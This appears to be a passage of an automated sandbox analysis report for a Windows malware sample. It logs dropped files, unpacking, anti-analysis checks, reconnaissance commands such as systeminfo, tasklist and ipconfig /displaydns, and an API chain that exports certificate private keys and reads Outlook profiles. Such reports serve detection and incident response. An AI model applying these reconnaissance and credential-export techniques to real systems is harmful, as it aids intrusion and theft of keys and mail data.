                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\uievsidSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\uievsidSection loaded: msimg32.dll
                Source: C:\Users\user\AppData\Roaming\uievsidSection loaded: msvcr100.dll
                Source: C:\Users\user\AppData\Roaming\haevsidSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\haevsidSection loaded: msimg32.dll
                Source: C:\Users\user\AppData\Roaming\haevsidSection loaded: msvcr100.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
                Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: veEGy9FijY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\veEGy9FijY.exeUnpacked PE file: 0.2.veEGy9FijY.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\haevsidUnpacked PE file: 5.2.haevsid.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeUnpacked PE file: 7.2.38E5.exe.400000.0.unpack .text:ER;.data:W;.yatufu:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\uievsidUnpacked PE file: 9.2.uievsid.400000.0.unpack .text:ER;.data:W;.yatufu:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\uievsidUnpacked PE file: 33.2.uievsid.400000.0.unpack .text:ER;.data:W;.yatufu:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\haevsidUnpacked PE file: 34.2.haevsid.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB43220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,10_2_00007FF6AAB43220
                Source: 38E5.exe.1.drStatic PE information: section name: .yatufu
                Source: uievsid.1.drStatic PE information: section name: .yatufu
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_025B1540 pushad ; ret 0_2_025B1550
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_0278385A push esp; ret 0_2_0278385C
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_027826FA pushfd ; iretd 0_2_027826FB
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_02781BFD push B63524ADh; retn 001Fh0_2_02781C34
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_0276D884 pushad ; retf 0_2_0276D885
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_004031DB push eax; ret 5_2_004032AB
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_025B1540 pushad ; ret 5_2_025B1550
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_02751035 push B63524ADh; retn 001Fh5_2_0275106C
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_02751B32 pushfd ; iretd 5_2_02751B33
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_02752C92 push esp; ret 5_2_02752C94
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_0040100B push esi; ret 7_2_0040100C
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_0040280E push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_0040281F push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00402822 push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00401328 push edi; retf 7_2_0040132A
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004027ED push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004027FB push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00434013 push ecx; ret 7_2_00434026
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004351E5 push ecx; ret 7_2_004351F8
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_0043A6F7 push ebx; ret 7_2_0043A6F8
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00612862 push esp; ret 7_2_00612A2D
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00611072 push esi; ret 7_2_00611073
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00612875 push esp; ret 7_2_00612A2D
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00612854 push esp; ret 7_2_00612A2D
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00612886 push esp; ret 7_2_00612A2D
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00612889 push esp; ret 7_2_00612A2D
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00611909 push esp; iretd 7_2_006119BF
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00611386 push edi; retf 7_2_00611391
                Source: 38E5.exe.1.drStatic PE information: section name: .text entropy: 7.722655643147913
                Source: uievsid.1.drStatic PE information: section name: .text entropy: 7.722655643147913

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\haevsidJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BC8F.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\38E5.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uievsidJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uievsidJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\haevsidJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\veegy9fijy.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\haevsid:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\uievsid:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\veEGy9FijY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\haevsidKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_15-882
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
                Source: C:\Users\user\Desktop\veEGy9FijY.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
                Source: C:\Users\user\Desktop\veEGy9FijY.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
                Source: C:\Users\user\AppData\Roaming\haevsidAPI/Special instruction interceptor: Address: 7FFE2220E814
                Source: C:\Users\user\AppData\Roaming\haevsidAPI/Special instruction interceptor: Address: 7FFE2220D584
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
                Source: C:\Users\user\AppData\Roaming\uievsidAPI/Special instruction interceptor: Address: 7FFE2220E814
                Source: C:\Users\user\AppData\Roaming\uievsidAPI/Special instruction interceptor: Address: 7FFE2220D584
                Source: uievsid, 00000009.00000002.2754391741.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKI
                Source: haevsid, 00000005.00000002.1970692682.000000000272E000.00000004.00000020.00020000.00000000.sdmp, 38E5.exe, 00000007.00000002.2487448009.000000000082E000.00000004.00000020.00020000.00000000.sdmp, haevsid, 00000022.00000002.3707612845.00000000027C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: veEGy9FijY.exe, 00000000.00000002.1737243592.000000000275E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKA
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00B41016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,15_2_00B41016
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 420Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1094Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 805Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 379Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3425Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 905Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 850Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 2504Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2061Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 3660Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3567
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_10-4476
                Source: C:\Windows\explorer.exe TID: 6900Thread sleep count: 420 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6924Thread sleep count: 1094 > 30Jump to behavior
